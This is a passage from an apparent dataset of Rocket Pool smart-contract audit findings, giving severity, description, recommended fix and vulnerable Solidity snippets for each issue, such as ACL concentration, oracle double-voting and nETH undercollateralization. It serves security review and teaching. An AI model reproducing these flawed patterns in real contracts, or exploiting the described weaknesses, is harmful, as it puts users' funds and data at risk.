interval. This would essentially restart the APY interval at `block.number`, skipping blocks of the current interval that have not been accounted for.\\nThe following diagram illustrates the skipped blocks due to the incorrect recording of `inflationCalcBlock` as `block.number`. The example assumes that we are in interval 4 but have not completed it. `3` APD intervals have passed, and this is what the inflation rate is based on. However, the `inflationCalcBlock` is updated to the current `block.number`, skipping some time/blocks that are now unaccounted in the APY restarting the 4th interval at `block.number`.\\n\\nNote: updating the inflation rate will directly affect past inflation intervals that have not been minted! this might be undesirable, and it could be considered to force an inflation mint if the APY changes\\nNote: if the interval is small enough and there is a history of unaccounted intervals to be minted, and the Ethereum network is congested, gas fees may be high and block limits hit, the calculations in the for loop might be susceptible to DoS the inflation mechanism because of gas constraints.\\nNote: The inflation seems only to be triggered regularly on `RocketRewardsPool.claim` (or at any point by external actors). If the price establishes based on the total supply of tokens, then this may give attackers an opportunity to front-run other users trading large amounts of RPL that may previously have calculated their prices based on the un-inflated supply.\\nNote: that the discrete interval-based inflation (e.g., once a day) might create dynamics that put pressure on users to trade their RPL in windows instead of consecutively\\nthe inflation intervals passed is the number of completed intervals. The current interval that is started is not included.\\n```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n\\nthe inflation calculation calculates the to-be-minted tokens for the inflation rate at `newTokens = supply * rateAPD^intervals - supply`\\n```\\nfunction inflationCalculate() override public view returns (uint256) {\\n // The inflation amount\\n uint256 inflationTokenAmount = 0;\\n // Optimisation\\n uint256 inflationRate = getInflationIntervalRate();\\n // Compute the number of inflation intervals elapsed since the last time we minted infation tokens\\n uint256 intervalsSinceLastMint = getInlfationIntervalsPassed();\\n // Only update if last interval has passed and inflation rate is > 0\\n if(intervalsSinceLastMint > 0 && inflationRate > 0) {\\n // Our inflation rate\\n uint256 rate = inflationRate;\\n // Compute inflation for total inflation intervals elapsed\\n for (uint256 i = 1; i < intervalsSinceLastMint; i++) {\\n rate = rate.mul(inflationRate).div(10 \\*\\* 18);\\n }\\n // Get the total supply now\\n uint256 totalSupplyCurrent = totalSupply();\\n // Return inflation amount\\n inflationTokenAmount = totalSupplyCurrent.mul(rate).div(10 \\*\\* 18).sub(totalSupplyCurrent);\\n }\\n // Done\\n return inflationTokenAmount;\\n}\\n```\\nчProperly track `inflationCalcBlock` as the end of the previous interval, as this is up to where the inflation was calculated, instead of the block at which the method was invoked.\\nEnsure APY/APD and interval configuration match up. Ensure the interval is not too small (potential gas DoS blocking inflation mint and RocketRewardsPool.claim).чч```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n -RocketDAONodeTrustedUpgrade - upgrade does not prevent the use of the same address multiple times creating an inconsistency where getContractAddress returns outdated informationчhighчWhen adding a new contract, it is checked whether the address is already in use. This check is missing when upgrading a named contract to a new implementation, potentially allowing someone to register one address to multiple names creating an inconsistent configuration.\\nThe crux of this is, that, `getContractAddress()` will now return a contract address that is not registered anymore (while `getContractName` may throw). `getContractAddress` can therefore not relied upon when checking ACL.\\nadd contract `name=test, address=0xfefe` ->\\n```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n\\nadd another contract `name=badcontract, address=0xbadbad` ->\\n```\\nsets contract.exists.0xbadbad=true\\nsets contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\nupdate contract `name=test, address=0xbadbad` reusing badcontradcts address, the address is now bound to 2 names (test, badcontract)\\n```\\noverwrites contract.exists.0xbadbad=true` (even though its already true)\\nupdates contract.name.0xbadbad=test (overwrites the reference to badcontract; badcontracts config is now inconsistent)\\nupdates contract.address.test=0xbadbad (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xfefe (ok)\\nremoves contract.exists.0xfefe (ok)\\n```\\n\\nupdate contract `name=test, address=0xc0c0`\\n```\\nsets contract.exists.0xc0c0=true\\nsets contract.name.0xc0c0=test (ok, expected)\\nupdates contract.address.test=0xc0c0 (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\nremoves contract.exists.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\n```\\n\\nAfter this, `badcontract` is partially cleared, `getContractName(0xbadbad)` throws while `getContractAddress(badcontract)` returns `0xbadbad` which is already unregistered (contract.exists.0xbadbad=false)\\n```\\n(removed) contract.exists.0xbadbad\\n(removed) contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\ncheck in `_addContract``\\n```\\nrequire(\\_contractAddress != address(0x0), \"Invalid contract address\");\\n```\\n\\nno checks in `upgrade.`\\n```\\nrequire(\\_contractAddress != address(0x0), \"Invalid contract address\");\\nrequire(\\_contractAddress != oldContractAddress, \"The contract address cannot be set to its current address\");\\n// Register new contract\\nsetBool(keccak256(abi.encodePacked(\"contract.exists\", \\_contractAddress)), true);\\nsetString(keccak256(abi.encodePacked(\"contract.name\", \\_contractAddress)), \\_name);\\nsetAddress(keccak256(abi.encodePacked(\"contract.address\", \\_name)), \\_contractAddress);\\nsetString(keccak256(abi.encodePacked(\"contract.abi\", \\_name)), \\_contractAbi);\\n```\\nчResolution\\nA check has been introduced to make sure that the new contract address is not already in use by checking against the corresponding `contract.exists` storage key.\\nCheck that the address being upgraded to is not yet registered and properly clean up `contract.address.`.чч```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n -RocketStorage - Risk concentration by giving all registered contracts permissions to change any settings in RocketStorage AcknowledgedчhighчThe ACL for changing settings in the centralized `RocketStorage` allows any registered contract (listed under contract.exists) to change settings that belong to other parts of the system.\\nThe concern is that if someone finds a way to add their malicious contract to the registered contact list, they will override any setting in the system. The storage is authoritative when checking certain ACLs. Being able to set any value might allow an attacker to gain control of the complete system. Allowing any contract to overwrite other contracts' settings dramatically increases the attack surface.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\n\\n```\\nfunction setAddress(bytes32 \\_key, address \\_value) onlyLatestRocketNetworkContract override external {\\n addressStorage[\\_key] = \\_value;\\n}\\n\\n/// @param \\_key The key for the record\\nfunction setUint(bytes32 \\_key, uint \\_value) onlyLatestRocketNetworkContract override external {\\n uIntStorage[\\_key] = \\_value;\\n}\\n```\\nчResolution\\nThe client provided the following statement:\\nWe've looked at adding access control contracts using namespaces, but the increase in gas usage would be significant and could hinder upgrades.\\nAllow contracts to only change settings related to their namespace.чч```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\n -RocketDAOProposals - require a minimum participation quorum for DAO proposalsчmediumчIf the DAO falls below the minimum viable membership threshold, voting for proposals still continues as DAO proposals do not require a minimum participation quorum. In the worst case, this would allow the last standing DAO member to create a proposal that would be passable with only one vote even if new members would be immediately ready to join via the recovery mode (which has its own risks) as the minimum votes requirement for proposals is set as `>0`.\\n```\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n\\n```\\nfunction propose(string memory \\_proposalMessage, bytes memory \\_payload) override public onlyTrustedNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrustedProposals\", address(this)) returns (uint256) {\\n // Load contracts\\n RocketDAOProposalInterface daoProposal = RocketDAOProposalInterface(getContractAddress('rocketDAOProposal'));\\n RocketDAONodeTrustedInterface daoNodeTrusted = RocketDAONodeTrustedInterface(getContractAddress('rocketDAONodeTrusted'));\\n RocketDAONodeTrustedSettingsProposalsInterface rocketDAONodeTrustedSettingsProposals = RocketDAONodeTrustedSettingsProposalsInterface(getContractAddress(\"rocketDAONodeTrustedSettingsProposals\"));\\n // Check this user can make a proposal now\\n require(daoNodeTrusted.getMemberLastProposalBlock(msg.sender).add(rocketDAONodeTrustedSettingsProposals.getCooldown()) <= block.number, \"Member has not waited long enough to make another proposal\");\\n // Record the last time this user made a proposal\\n setUint(keccak256(abi.encodePacked(daoNameSpace, \"member.proposal.lastblock\", msg.sender)), block.number);\\n // Create the proposal\\n return daoProposal.add(msg.sender, 'rocketDAONodeTrustedProposals', \\_proposalMessage, block.number.add(rocketDAONodeTrustedSettingsProposals.getVoteDelayBlocks()), rocketDAONodeTrustedSettingsProposals.getVoteBlocks(), rocketDAONodeTrustedSettingsProposals.getExecuteBlocks(), daoNodeTrusted.getMemberQuorumVotesRequired(), \\_payload);\\n}\\n```\\n\\nSidenote: Since a proposals acceptance quorum is recorded on proposal creation, this may lead to another scenario where proposals acceptance quorum may never be reached if members leave the DAO. This would require a re-submission of the proposal.чDo not accept proposals if the member count falls below the minimum DAO membercount threshold.чч```\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n -RocketDAONodeTrustedUpgrade - inconsistent upgrade blacklistчmediumч`upgradeContract` defines a hardcoded list of contracts that cannot be upgraded because they manage their own settings (statevars) or they hold value in the system.\\nthe list is hardcoded and cannot be extended when new contracts are added via `addcontract`. E.g. what if another contract holding value is added to the system? This would require an upgrade of the upgrade contract to update the whitelist (gas hungry, significant risk of losing access to the upgrade mechanisms if a bug is being introduced).\\na contract named `rocketPoolToken` is blacklisted from being upgradeable but the system registers no contract called `rocketPoolToken`. This may be an oversight or artifact of a previous iteration of the code. However, it may allow a malicious group of nodes to add a contract that is not yet in the system which cannot be removed anymore as there is no `removeContract` functionality and `upgradeContract` to override the malicious contract will fail due to the blacklist.\\nNote that upgrading `RocketTokenRPL` requires an account balance migration as contracts in the system may hold value in `RPL` (e.g. a lot in AuctionManager) that may vanish after an upgrade. The contract is not exempt from upgrading. A migration may not be easy to perform as the system cannot be paused to e.g. snapshot balances.\\n```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(\"rocketVault\")), \"Cannot upgrade the vault\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketPoolToken\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenRETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenNETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"casperDeposit\")), \"Cannot upgrade the casper deposit contract\");\\n // Get old contract address & check contract exists\\n```\\nчConsider implementing a whitelist of contracts that are allowed to be upgraded instead of a more error-prone blacklist of contracts that cannot be upgraded.\\nProvide documentation that outlines what contracts are upgradeable and why.\\nCreate a process to verify the blacklist before deploying/operating the system.\\nPlan for migration paths when upgrading contracts in the system\\nAny proposal that reaches the upgrade contract must be scrutinized for potential malicious activity (e.g. as any registered contract can directly modify storage or may contain subtle backdoors. Upgrading without performing a thorough security inspection may easily put the DAO at risk)чч```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(\"rocketVault\")), \"Cannot upgrade the vault\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketPoolToken\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenRETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenNETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"casperDeposit\")), \"Cannot upgrade the casper deposit contract\");\\n // Get old contract address & check contract exists\\n```\\n -RocketMinipoolStatus - DAO Membership changes can result in votes getting stuckчmediumчChanges in the DAO's trusted node members are reflected in the `RocketDAONodeTrusted.getMemberCount()` function. When compared with the vote on consensus threshold, a DAO-driven decision is made, e.g., when updating token price feeds and changing Minipool states.\\nEspecially in the early phase of the DAO, the functions below can get stuck as execution is restricted to DAO members who have not voted yet. Consider the following scenario:\\nThe DAO consists of five members\\nTwo members vote to make a Minipool withdrawable\\nThe other three members are inactive, the community votes, and they get kicked from the DAO\\nThe two remaining members have no way to change the Minipool state now. All method calls to trigger the state update fails because the members have already voted before.\\nNote: votes of members that are kicked/leave are still count towards the quorum!\\nSetting a Minipool into the withdrawable state:\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n\\nSubmitting a block's network balances:\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n updateBalances(\\_block, \\_totalEth, \\_stakingEth, \\_rethSupply);\\n}\\n```\\n\\nSubmitting a block's RPL price information:\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\nчResolution\\nThis issue has been fixed in PR https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/204 by introducing a public method that allows anyone to manually trigger a DAO consensus threshold check and a subsequent balance update in case the issue's example scenario occurs.\\nThe conditional check and update of price feed information, Minipool state transition, etc., should be externalized into a separate public function. This function is also called internally in the existing code. In case the DAO gets into the scenario above, anyone can call the function to trigger a reevaluation of the condition with updated membership numbers and thus get the process unstuck.чч```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n -Trusted/Oracle-Nodes can vote multiple times for different outcomesчmediumчTrusted/oracle nodes submit various ETH2 observations to the RocketPool contracts. When 51% of nodes submitted the same observation, the result is stored in the contract. However, while it is recorded that a node already voted for a specific minipool (being withdrawable & balance) or block (price/balance), a re-submission with different parameters for the same minipool/block is not rejected.\\nSince the oracle values should be distinct, clear, and there can only be one valid value, it should not be allowed for trusted nodes to change their mind voting for multiple different outcomes within one block or one minipool\\n`RocketMinipoolStatus` - a trusted node can submit multiple different results for one minipool\\nNote that `setBool(keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, _minipoolAddress)), true);` is recorded but never checked. (as for the other two instances)\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.count\", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n\\n`RocketNetworkBalances` - a trusted node can submit multiple different results for the balances at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"network.balances.submitted.node\", msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"network.balances.submitted.count\", \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"network.balances.submitted.node\", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit balances submitted event\\nemit BalancesSubmitted(msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply, block.timestamp);\\n// Check submission count & update network balances\\n```\\n\\n`RocketNetworkPrices` - a trusted node can submit multiple different results for the price at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"network.prices.submitted.node\", msg.sender, \\_block, \\_rplPrice));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"network.prices.submitted.count\", \\_block, \\_rplPrice));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"network.prices.submitted.node\", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit prices submitted event\\nemit PricesSubmitted(msg.sender, \\_block, \\_rplPrice, block.timestamp);\\n// Check submission count & update network prices\\n```\\nчOnly allow one vote per minipool/block. Don't give nodes the possibility to vote multiple times for different outcomes.чч```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.count\", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n -RocketTokenNETH - Pot. discrepancy between minted tokens and deposited collateralчmediumчThe `nETH` token is paid to node operators when minipool becomes withdrawable. `nETH` is supposed to be backed by `ETH` 1:1. However, in most cases, this will not be the case.\\nThe `nETH` minting and deposition of collateral happens in two different stages of a minipool. `nETH` is minted in the minipool state transition from `Staking` to `Withdrawable` when the trusted/oracle nodes find consensus on the fact that the minipool became withdrawable (submitWinipoolWithdrawable).\\n```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n\\nWhen consensus is found on the state of the `minipool`, `nETH` tokens are minted to the `minipool` address according to the withdrawal amount observed by the trusted/oracle nodes. At this stage, `ETH` backing the newly minted `nETH` was not yet provided.\\n```\\nuint256 nodeAmount = getMinipoolNodeRewardAmount(\\n minipool.getNodeFee(),\\n userDepositBalance,\\n minipool.getStakingStartBalance(),\\n minipool.getStakingEndBalance()\\n);\\n// Mint nETH to minipool contract\\nif (nodeAmount > 0) { rocketTokenNETH.mint(nodeAmount, \\_minipoolAddress); }\\n```\\n\\nThe `nETH` token contract now holds more `nETH.totalsupply` than actual `ETH` collateral. It is out of sync with the `ETH` reserve and therefore becomes undercollateralized. This should generally be avoided as the security guarantees that for every `nETH` someone deposited, `ETH` does not hold. However, the newly minted `nETH` is locked to the `minipoolAddress`, and the minipool has no means of redeeming the `nETH` for `ETH` directly (via nETH.burn()).\\nThe transition from Withdrawable to `Destroyed` the actual collateral for the previously minted `nETH` (still locked to minipoolAddress) is provided by the `Eth2` withdrawal contract. There is no specification for the withdrawal contract as of now. Still, it is assumed that some entity triggers the payout for the `Eth2` rewards on the withdrawal contract, which sends the amount of `ETH` to the configured withdrawal address (the minipoolAddress).\\nThe `minipool.receive()` function receives the `ETH`\\n```\\nreceive() external payable {\\n (bool success, bytes memory data) = getContractAddress(\"rocketMinipoolDelegate\").delegatecall(abi.encodeWithSignature(\"receiveValidatorBalance()\"));\\n if (!success) { revert(getRevertMessage(data)); }\\n}\\n```\\n\\nand forwards it to `minipooldelegate.receiveValidatorBalance`\\n```\\nrequire(msg.sender == rocketDAOProtocolSettingsNetworkInterface.getSystemWithdrawalContractAddress(), \"The minipool's validator balance can only be sent by the eth1 system withdrawal contract\");\\n// Set validator balance withdrawn status\\nvalidatorBalanceWithdrawn = true;\\n// Process validator withdrawal for minipool\\nrocketNetworkWithdrawal.processWithdrawal{value: msg.value}();\\n```\\n\\nWhich calculates the `nodeAmount` based on the `ETH` received and submits it as collateral to back the previously minted `nodeAmount` of `nETH`.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n// Set withdrawal processed status\\nrocketMinipoolManager.setMinipoolWithdrawalProcessed(msg.sender);\\n// Transfer node balance to nETH contract\\nif (nodeAmount > 0) { rocketTokenNETH.depositRewards{value: nodeAmount}(); }\\n// Transfer user balance to rETH contract or deposit pool\\n```\\n\\nLooking at how the `nodeAmount` of `nETH` that was minted was calculated and comparing it to how `nodeAmount` of `ETH` is calculated, we can observe the following:\\nthe `nodeAmount` of `nETH` minted is an absolute number of tokens based on the rewards observed by the trusted/oracle nodes. the `nodeAmount` is stored in the storage and later used to calculate the collateral deposit in a later step.\\nthe `nodeAmount` calculated when depositing the collateral is first assumed to be a `nodeShare` (line 47), while it is actually an absolute number. the `nodeShare` is then turned into a `nodeAmount` relative to the `ETH` supplied to the contract.\\nDue to rounding errors, this might not always exactly match the `nETH` minted (see https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/26).\\nThe collateral calculation is based on the `ETH` value provided to the contract. If this value does not exactly match what was reported by the oracle/trusted nodes when minting `nETH`, less/more collateral will be provided.\\nNote: excess collateral will be locked in the `nETH` contract as it is unaccounted for in the `nETH` token contract and therefore cannot be redeemed.\\nNote: providing less collateral will go unnoticed and mess up the 1:1 `nETH:ETH` peg. In the worst case, there will be less `nETH` than `ETH`. Not everybody will be able to redeem their `ETH`.\\nNote: keep in mind that the `receive()` function might be subject to gas restrictions depending on the implementation of the withdrawal contract (.call() vs. .transfer())\\nThe `nETH` minted is initially uncollateralized and locked to the `minipoolAddress`, which cannot directly redeem it for `ETH`. The next step (next stage) is collateralized with the staking rewards (which, as noted, might not always completely add up to the minted nETH). At the last step in `withdraw()`, the `nETH` is transferred to the `withdrawalAddress` of the minipool.\\n```\\nuint256 nethBalance = rocketTokenNETH.balanceOf(address(this));\\nif (nethBalance > 0) {\\n // Get node withdrawal address\\n RocketNodeManagerInterface rocketNodeManager = RocketNodeManagerInterface(getContractAddress(\"rocketNodeManager\"));\\n address nodeWithdrawalAddress = rocketNodeManager.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer\\n require(rocketTokenNETH.transfer(nodeWithdrawalAddress, nethBalance), \"nETH balance was not successfully transferred to node operator\");\\n // Emit nETH withdrawn event\\n emit NethWithdrawn(nodeWithdrawalAddress, nethBalance, block.timestamp);\\n}\\n```\\n\\nSince the `nETH` initially minted can never take part in the `nETH` token market (as it is locked to the minipool address, which can only transfer it to the withdrawal address in the last step), the question arises why it is actually minted early in the lifecycle of the minipool. At the same time, it could as well be just directly minted to `withdrawalAddress` when providing the right amount of collateral in the last step of the minipool lifecycle. Furthermore, if `nETH` is minted at this stage, it should be questioned why `nETH` is actually needed when you can directly forward the `nodeAmount` to the `withdrawalAddress` instead of minting an intermediary token that is pegged 1:1 to `ETH`.\\nFor reference, `depositRewards` (providing collateral) and `mint` are not connected at all, hence the risk of `nETH` being an undercollateralized token.\\n```\\nfunction depositRewards() override external payable onlyLatestContract(\"rocketNetworkWithdrawal\", msg.sender) {\\n // Emit ether deposited event\\n emit EtherDeposited(msg.sender, msg.value, block.timestamp);\\n}\\n\\n// Mint nETH\\n// Only accepts calls from the RocketMinipoolStatus contract\\nfunction mint(uint256 \\_amount, address \\_to) override external onlyLatestContract(\"rocketMinipoolStatus\", msg.sender) {\\n // Check amount\\n require(\\_amount > 0, \"Invalid token mint amount\");\\n // Update balance & supply\\n \\_mint(\\_to, \\_amount);\\n // Emit tokens minted event\\n emit TokensMinted(\\_to, \\_amount, block.timestamp);\\n}\\n```\\nчIt looks like `nETH` might not be needed at all, and it should be discussed if the added complexity of having a potentially out-of-sync `nETH` token contract is necessary and otherwise remove it from the contract system as the `nodeAmount` of `ETH` can directly be paid out to the `withdrawalAddress` in the `receiveValidatorBalance` or `withdraw` transitions.\\nIf `nETH` cannot be removed, consider minting `nodeAmount` of `nETH` directly to `withdrawalAddress` on `withdraw` instead of first minting uncollateralized tokens. This will also reduce the gas footprint of the Minipool.\\nEnsure that the initial `nodeAmount` calculation matches the minted `nETH` and deposited to the contract as collateral (absolute amount vs. fraction).\\nEnforce that `nETH` requires collateral to be provided when minting tokens.чч```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n -RocketMiniPoolDelegate - on destroy() leftover ETH is sent to RocketVault where it cannot be recoveredчmediumчWhen destroying the `MiniPool`, leftover `ETH` is sent to the `RocketVault`. Since `RocketVault` has no means to recover “unaccounted” `ETH` (not deposited via depositEther), funds forcefully sent to the vault will end up being locked.\\n```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(\"rocketVault\")));\\n}\\n```\\nчImplement means to recover and reuse `ETH` that was forcefully sent to the contract by `MiniPool` instances.чч```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(\"rocketVault\")));\\n}\\n```\\n -RocketDAO - personally identifiable member information (PII) stored on-chain AcknowledgedчmediumчLike a DAO user's e-mail address, PII is stored on-chain and can, therefore, be accessed by anyone. This may allow de-pseudonymize users (and correlate Ethereum addresses to user email addresses) and be used for spamming or targeted phishing campaigns putting the DAO users at risk.\\nrocketpool-go-2.5-Tokenomics/dao/trustednode/dao.go:L173-L183\\n```\\n// Return\\nreturn MemberDetails{\\n Address: memberAddress,\\n Exists: exists,\\n ID: id,\\n Email: email,\\n JoinedBlock: joinedBlock,\\n LastProposalBlock: lastProposalBlock,\\n RPLBondAmount: rplBondAmount,\\n UnbondedValidatorCount: unbondedValidatorCount,\\n}, nil\\n```\\n\\n```\\nfunction getMemberEmail(address \\_nodeAddress) override public view returns (string memory) {\\n return getString(keccak256(abi.encodePacked(daoNameSpace, \"member.email\", \\_nodeAddress))); \\n}\\n```\\nчAvoid storing PII on-chain where it is readily available for anyone.чч```\\n// 